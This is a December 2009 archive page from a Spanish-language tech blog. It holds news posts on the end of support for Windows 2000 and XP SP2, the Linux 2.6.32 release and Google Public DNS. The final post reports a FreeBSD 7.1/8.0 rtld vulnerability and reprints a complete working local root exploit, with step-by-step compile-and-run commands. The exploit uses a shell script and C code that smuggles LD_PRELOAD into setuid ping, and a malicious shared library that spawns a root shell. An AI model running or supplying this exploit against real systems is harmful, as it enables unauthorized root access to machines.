Monthly Archives: diciembre 2009

Win 2000 y XP SP2 sin soporte

By on 8 diciembre, 2009

Microsoft está procediendo a cerrar el soporte de sus sistemas Windows más “añejos” poco a poco. Ahora han anunciado que el 13 de julio de 2010 tanto Windows 2000 como Windows XP SP2 se quedarán sin soporte oficial. Para Windows XP sigue habiendo la oportunidad de actualizar al Service Pack 3, aunque desde Microsoft recomiendon (como no podría ser de otra manera) que los usuarios se actualicen a Windows 7. Aún con el soporte a punto de caducar, Windows XP sigue siendo el Windows más popular.

Aunque Windows XP sigue resistiendo como el sistema más popular para ordenadores personales, las versiones más antiguas van perdiendo el beneficio del soporte técnico por parte de Microsoft. Así la compañía ha anunciado que el 13 de julio de 2010 se terminará el soporte tanto para Windows 2000 como para el Windows XP con Service Pack 2.

Microsoft recomienda actualizar a versiones más actuales y si es posible a Windows 7.  Hay que tener en cuenta,  que mientras Windows Vista tiene prevista su salida del sistema de soporte en 2012 (fecha en la que al parecer podría aterrizar Windows 8) el Windows XP SP3 continuará siendo válido hasta el año 2014.

Posted in Tagged

Publicado el núcleo de Linux 2.6.32

By on 7 diciembre, 2009

Linus Torvalds ha publicado oficialmente la versión 2.6.32 del núcleo de Linux. Entre las mejoras de este lanzamiento destacan importantes funciones en la virtualización, particularmente una mejor gestión de la memoria que ahora es compartida por el anfitrión con las máquinas virtuales.

Hay también mejoras, sobre todo en velocidad, para Btrfs; soporte para 3D y KMS en Ati R600/R700, modo de baja latencia en el organizador CFQ, limites suaves en el controlador de memoria, soporte para la arquitectura S+Core, soporte para Moorestown de Intel y su nueva interfaz de programación en firme, enfoque tipo NAPI para los dispositivos de bloques, soporte para el motor de gestión de energía y muchas otras mejoras y nuevos controladores.

La lista completa de cambios está disponible en este enlace. Quien tenga interés en compilar desde el código fuente, puede descargar éste desde este enlace.

Posted in Tagged

Google Public DNS

By on 6 diciembre, 2009

Google ha lanzado hoy su servicio de DNS con el objetivo general de mejorar la experiencia del usuario en la navegación web. Afirman en el anuncio oficial del servicio que, en la actual situación, en la que la Red no deja de crecer, deben existir más alternativas en cuanto a los DNS para poder abastecer a todas las solicitudes que se generan en la navegación del usuario.En el mencionado  anuncio, además de describir las instrucciones para sustitutir nuestros actuales DNS en sistemas GNU/Linux, menciona tres objetivos principales:

  1. Ofrecer a los usuarios una alternativa a los DNS de su proveedor con el objetivos de mejorar el rendimiento, la velocidad y la seguridad de la navegación web.
  2. Ayudar en la reducción de carga de los DNS de los ISP. Gracias a su “global data-center” e infraestructura pueden abastecer gran cantidad de solicitudes por parte de los usuarios (DNS lookups) sin tener que pasar por otros DNS para resolver el dominio.
  3. Ayudar a hacer la Red más rápida y segura. “Estamos lanzando este servicio experimental para probar nuevas vías de acercamiento a los desafíos de los DNS. Esperamos compartir lo que aprendamos con los desarrolladores de DNS y con la comunidad web y conocer su opinión”, afirman desde Google.

Aquí encontraréis el anuncio oficial con mayor información respecto a este servicio y sus objetivos.

Los DNS de Google son:

8.8.8.8
8.8.4.4

Instrucciones para su uso en sistemas GNU/Linux, Mac OS y Windows: aquí.

Acceso a la política de privacidad de Google DNS: aquí.

Posted in Tagged

Fallo en FreeBSD permite obtener root

By on 2 diciembre, 2009

Acaba de hacerse publica una vulnerabilidad descubierta por Nikolaos Rangos en los sistemas FreeBSD que permite escalar privilegios y obtener permisos de root en las versiones 8.0 y 7.1 de este sistema operativo.

El error reside en el Run-Time-Link Editor (rtld), que normalmente no permite variables de entorno peligrosas como LD_PRELOAD pero con una técnica sencilla el rtld pueden ser engañado para que acepte variables LD, incluso en los binarios setugid.

VERSIONES DE FREEBSD AFECTADAS
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NO VULNERABLE
FreeBSD 4.9-RELEASE *** NO VULNERABLE

Para más detalles ver el exploit.

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF

Para compilar y ejecutar

gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Mas Información en el Full Disclosure publicado por Nikolaos Rangos

Posted in